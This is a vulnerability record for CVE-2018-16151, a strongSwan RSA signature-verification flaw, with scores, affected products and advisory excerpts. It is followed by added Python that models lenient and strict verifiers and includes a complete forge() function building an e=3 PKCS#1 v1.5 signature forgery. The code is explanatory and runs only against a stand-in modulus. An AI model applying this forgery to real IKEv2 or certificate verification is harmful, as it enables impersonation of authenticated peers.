CVSSv3: 7.5

CVE-2018-16151

Published: 26/09/2018 Updated: 07/11/2023
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 445
Vector (CVSS v2): AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x prior to 5.7.0, the RSA implementation based on GMP does not reject excess data after the encoded algorithm OID during PKCS#1 v1.5 signature verification. Similar to the flaw in the same version of strongSwan regarding digestAlgorithm.parameters, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication.

Vulnerable Products

strongSwan strongSwan (4.x and 5.x before 5.7.0)
Debian Linux 8.0
Debian Linux 9.0
Canonical Ubuntu Linux 16.04
Canonical Ubuntu Linux 14.04
Canonical Ubuntu Linux 18.04

Vendor Advisories

Several security issues were fixed in strongSwan ...
Sze Yiu Chau and his team from Purdue University and The University of Iowa found several issues in the gmp plugin for strongSwan, an IKE/IPsec suite. Problems in the parsing and verification of RSA signatures could lead to a Bleichenbacher-style low-exponent signature forgery in certificates and during IKE authentication. While the gmp plugin does ...
Google's OSS-Fuzz revealed an exploitable bug in the gmp plugin caused by the patch that fixes CVE-2018-16151 and CVE-2018-16152 (DSA-4305-1). An attacker could trigger it using crafted certificates with RSA keys with very small moduli. Verifying signatures with such keys would cause an integer underflow and subsequent heap buffer overflow resultin ...
The OID parser allows any number of random bytes after a valid OID for a PKCS#1 v1.5 signature. The asn1_known_oid() function just parses until it finds a leaf in the tree of known OIDs; any further data that follows is simply ignored. And the function that parses ASN.1 algorithmIdentifier structures doesn't care if the full OID data was parsed as it ...
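The flaw described in the Vulnerability Summary and in the strongSwan advisory excerpt above can be modelled end to end. The Python below is an added example written for this page; it is not strongSwan code and the function names are the example's own. It models an EMSA-PKCS1-v1_5 verifier in two modes: a lenient mode that, like the asn1_known_oid() path the advisory describes, accepts an OID element as soon as the known OID has been matched and ignores whatever follows it inside the element, and a strict mode that requires the element to be exactly the SHA-256 OID. It then builds a forged e = 3 signature of the garbage-in-the-middle kind: the bytes after the OID are free, the suffix (NULL parameters, the OCTET STRING header and the SHA-256 digest) is pinned by a cube root modulo 2^288, and the fixed prefix is pinned by an integer cube root, so the forged value cubes to a correctly padded encoding without ever being reduced modulo n. Assumptions not taken from the page: a 2048-bit modulus (a seeded random odd integer stands in for the peer's public modulus, because the forgery never touches the private key), SHA-256 as the digest algorithm, 176 junk bytes, and an attacker who can vary the message until its digest ends in an odd byte.

```python
import hashlib
import random

SHA256_OID = bytes.fromhex("608648016503040201")  # DER body of OID 2.16.840.1.101.3.4.2.1


def read_tlv(buf, pos):
    """Read one DER element at buf[pos]; return (tag, body, offset after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                              # long form: 0x81 nn / 0x82 nn nn
        count = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + count], "big"), pos + count
    return tag, buf[pos:pos + length], pos + length


def digest_from_em(em, strict):
    """Parse EMSA-PKCS1-v1_5 (00 01 FF..FF 00 DigestInfo); return the digest or None.
    strict=False models the bug: bytes after the matched OID inside the OID element are ignored."""
    if em[:2] != b"\x00\x01":
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return None
    tag, di, end = read_tlv(em, i + 1)
    if tag != 0x30 or end != len(em):              # data after DigestInfo is rejected
        return None
    tag, alg, p = read_tlv(di, 0)
    tag2, oid, q = read_tlv(alg, 0)
    if tag != 0x30 or tag2 != 0x06:
        return None
    oid_ok = oid == SHA256_OID if strict else oid.startswith(SHA256_OID)
    if not oid_ok or alg[q:] != b"\x05\x00":       # parameters must be an explicit NULL
        return None
    tag, digest, r = read_tlv(di, p)
    if tag != 0x04 or r != len(di):
        return None
    return digest


def verify(n, sig, msg, strict):
    """RSASSA-PKCS1-v1_5 verification with e = 3, in lenient (buggy) or strict mode."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, 3, n).to_bytes(k, "big")
    try:
        digest = digest_from_em(em, strict)
    except IndexError:                             # truncated DER inside em
        return False
    return digest is not None and digest == hashlib.sha256(msg).digest()


def icbrt(v):
    """Floor of the cube root of the integer v > 0 (Newton's method)."""
    x = 1 << ((v.bit_length() + 2) // 3)
    while True:
        y = (2 * x + v // (x * x)) // 3
        if y >= x:
            return x
        x = y


def forge(n, msg, junk=176):
    """Forge an e = 3 signature over msg that the lenient verifier accepts.
    EM layout: [00 01 FF*r 00, DER headers, OID] [junk bytes] [05 00 04 20 digest]."""
    k = (n.bit_length() + 7) // 8
    digest = hashlib.sha256(msg).digest()
    if not digest[-1] & 1:
        raise ValueError("digest must end in an odd byte: cube roots mod 2^t exist only for odd values")
    l3 = 9 + junk                                  # OID element body: real OID, then junk
    l2 = 3 + l3 + 2                                # AlgorithmIdentifier: OID element + NULL
    l1 = 3 + l2 + 2 + 32                           # DigestInfo: AlgorithmIdentifier + OCTET STRING
    r = k - 6 - l1                                 # FF padding bytes (23 for a 2048-bit key)
    assert 128 <= l3 and l1 <= 255 and r >= 8, "layout valid only for these length ranges"
    prefix = (b"\x00\x01" + b"\xFF" * r + b"\x00"
              + bytes([0x30, 0x81, l1, 0x30, 0x81, l2, 0x06, 0x81, l3]) + SHA256_OID)
    suffix = b"\x05\x00\x04\x20" + digest
    t = 8 * len(suffix)                            # 288 bits pinned at the bottom of EM
    x = 8 * (k - len(prefix))                      # prefix occupies bits [x, 8k) of EM
    target = int.from_bytes(prefix, "big") << x
    # s = h*2^t + l: h^3*2^(3t) reproduces the prefix, and the cross terms of the cube reach
    # only about 2*bits(h) + 3t + 3 = 1647 bits, below x = 1696, so they land in the junk.
    h = icbrt(target >> (3 * t))
    if h ** 3 < (target >> (3 * t)):
        h += 1
    # l^3 == suffix (mod 2^t): cubing permutes the odd residues mod 2^t and 3 is invertible
    # modulo the group exponent 2^(t-2), so the cube root is one modular exponentiation.
    l = pow(int.from_bytes(suffix, "big"), pow(3, -1, 1 << (t - 2)), 1 << t)
    sig = (h << t) + l
    assert sig ** 3 < n                            # s^3 never wraps, so the verifier reads it back as-is
    return sig


def choose_message(base):
    """Vary a counter until the digest ends in an odd byte (half of all messages qualify)."""
    for ctr in range(256):
        msg = base + b" #%d" % ctr
        if hashlib.sha256(msg).digest()[-1] & 1:
            return msg
    raise RuntimeError("no odd digest found")


def demo_modulus():
    """Seeded stand-in for a 2048-bit public modulus; the forgery never needs the private key."""
    return (1 << 2047) | random.Random(2018).getrandbits(2047) | 1


if __name__ == "__main__":
    n, msg = demo_modulus(), choose_message(b"constructed IKEv2 AUTH payload")
    sig = forge(n, msg)
    print("lenient accepts:", verify(n, sig, msg, False), "strict accepts:", verify(n, sig, msg, True))
```

The lenient mode is the only thing that makes the forgery work: the strict comparison of the whole OID element (the `oid == SHA256_OID` branch) rejects the same signature, and so does the lenient parser for any message other than the one whose digest was pinned into the suffix. The construction also shows why key size matters as much as the exponent: with this layout and a 1024-bit modulus the 288-bit pinned suffix and the cube's cross terms would overrun the fixed prefix, so the free bytes have nowhere to go.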